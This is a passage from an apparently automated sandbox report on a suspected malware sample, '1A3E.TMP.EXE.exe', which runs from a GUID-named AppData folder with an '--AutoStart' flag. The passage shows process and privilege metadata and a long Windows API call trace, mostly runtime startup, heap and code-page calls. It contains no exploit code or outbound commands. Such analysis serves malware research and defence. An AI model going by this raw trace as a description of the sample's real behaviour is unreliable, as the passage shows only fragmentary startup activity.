= 87 os_tid = 0x24c Thread: id = 88 os_tid = 0x798 Thread: id = 114 os_tid = 0xaec Thread: id = 115 os_tid = 0xb80 Thread: id = 116 os_tid = 0xae8 Thread: id = 117 os_tid = 0x270 Thread: id = 118 os_tid = 0x284 Thread: id = 119 os_tid = 0xab0 Thread: id = 120 os_tid = 0xaac Thread: id = 121 os_tid = 0x710 Thread: id = 122 os_tid = 0x6cc Thread: id = 123 os_tid = 0xb70 Thread: id = 124 os_tid = 0xa28 Thread: id = 129 os_tid = 0x9c4 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 93 os_tid = 0xadc Thread: id = 94 os_tid = 0x638 Thread: id = 95 os_tid = 0x554 Thread: id = 96 os_tid = 0x720 Thread: id = 97 os_tid = 0x668 Thread: id = 98 os_tid = 0x65c Thread: id = 99 os_tid = 0x144 Thread: id = 100 os_tid = 0x110 Thread: id = 101 os_tid = 0x3f0 Thread: id = 102 os_tid = 0x3ec Thread: id = 103 os_tid = 0x3e4 Thread: id = 104 os_tid = 0x3e0 Thread: id = 105 os_tid = 0x3d0 Thread: id = 106 os_tid = 0x3cc Thread: id = 107 os_tid = 0x398 Thread: id = 108 os_tid = 0x394 Thread: id = 109 os_tid = 0x384 Thread: id = 110 os_tid = 0x380 Thread: id = 111 os_tid = 0x368 Thread: id = 112 os_tid = 0x350 Thread: id = 113 os_tid = 0x33c Thread: id = 125 os_tid = 0x614 Process: id = "10" image_name = "1a3e.tmp.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe" page_root = "0x1605c000" os_pid = "0x5e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x4a4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ee55" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 130 os_tid = 0x5e4 [0176.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1bfe29e0, dwHighDateTime=0x1d5ff3c)) [0176.787] GetCurrentProcessId () returned 0x5e0 [0176.787] GetCurrentThreadId () returned 0x5e4 [0176.787] GetTickCount () returned 0x11318fd [0176.787] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=7971902492) returned 1 [0183.779] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40768b)) [0183.779] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x230000 [0183.781] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.781] GetProcAddress (hModule=0x759e0000, lpProcName="FlsAlloc") returned 0x759f4f2b [0183.782] GetProcAddress (hModule=0x759e0000, lpProcName="FlsGetValue") returned 0x759f1252 [0183.782] GetProcAddress (hModule=0x759e0000, lpProcName="FlsSetValue") returned 0x759f4208 [0183.782] GetProcAddress (hModule=0x759e0000, lpProcName="FlsFree") returned 0x759f359f [0183.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.782] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.782] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.783] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.783] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.783] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.783] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.784] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.784] GetProcAddress (hModule=0x759e0000, lpProcName="DecodePointer") returned 0x77339d35 [0183.785] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x214) returned 0x2307d0 [0183.785] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.785] GetProcAddress (hModule=0x759e0000, lpProcName="DecodePointer") returned 0x77339d35 [0183.785] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759e0000 [0183.785] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0183.785] GetProcAddress (hModule=0x759e0000, lpProcName="DecodePointer") returned 0x77339d35 [0183.785] GetCurrentThreadId () returned 0x5e4 [0183.785] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0183.785] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2309f0 [0183.786] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0183.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0183.786] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0183.786] SetHandleCount (uNumber=0x20) returned 0x20 [0183.786] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" [0183.786] GetEnvironmentStringsW () returned 0x761f60* [0183.786] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0xb02) returned 0x2311f8 [0183.787] FreeEnvironmentStringsW (penv=0x761f60) returned 1 [0183.787] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4aadc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe")) returned 0x61 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0xe8) returned 0x231d08 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x9c) returned 0x231df8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x231ea0 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6c) returned 0x231ee8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6e) returned 0x231f60 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x78) returned 0x231fd8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x62) returned 0x232058 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x2320c8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x232100 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x28) returned 0x232150 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x232180 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4a) returned 0x2321a8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x72) returned 0x232200 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232280 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x2322b8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1c) returned 0x2322f0 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xd2) returned 0x232318 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x7c) returned 0x2323f8 [0183.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x232480 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3a) returned 0x2324c0 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x90) returned 0x232508 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x2325a0 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x2325d0 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x232608 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x232648 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x232698 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x2326f8 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x82) returned 0x232740 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x2327d0 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x28) returned 0x232808 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x232838 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2c) returned 0x232860 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x54) returned 0x232898 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x2328f8 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2a) returned 0x232958 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x232990 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x54) returned 0x2329d8 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x232a38 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232a68 [0183.788] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x8c) returned 0x232aa0 [0183.788] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2311f8 | out: hHeap=0x230000) returned 1 [0183.788] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759e0000 [0183.788] GetProcAddress (hModule=0x759e0000, lpProcName="IsProcessorFeaturePresent") returned 0x759f5235 [0183.789] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0183.790] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2311f8 [0183.790] GetLastError () returned 0x0 [0183.790] SetLastError (dwErrCode=0x0) [0183.790] GetLastError () returned 0x0 [0183.790] SetLastError (dwErrCode=0x0) [0183.790] GetLastError () returned 0x0 [0183.790] SetLastError (dwErrCode=0x0) [0183.790] GetACP () returned 0x4e4 [0183.790] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x220) returned 0x231a00 [0183.790] GetLastError () returned 0x0 [0183.791] SetLastError (dwErrCode=0x0) [0183.791] IsValidCodePage (CodePage=0x4e4) returned 1 [0183.791] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0183.791] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0183.791] GetLastError () returned 0x0 [0183.791] SetLastError (dwErrCode=0x0) [0183.791] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0183.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0183.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0183.791] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0183.791] GetLastError () returned 0x0 [0183.791] SetLastError (dwErrCode=0x0) [0183.791] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0183.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0183.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā") returned 256 [0183.791] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0183.791] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0183.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿP¤\x09À\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0183.791] GetLastError () returned 0x0 [0183.791] SetLastError (dwErrCode=0x0) [0183.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0183.792] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā") returned 256 [0183.792] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0183.792] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ댑@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0183.792] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 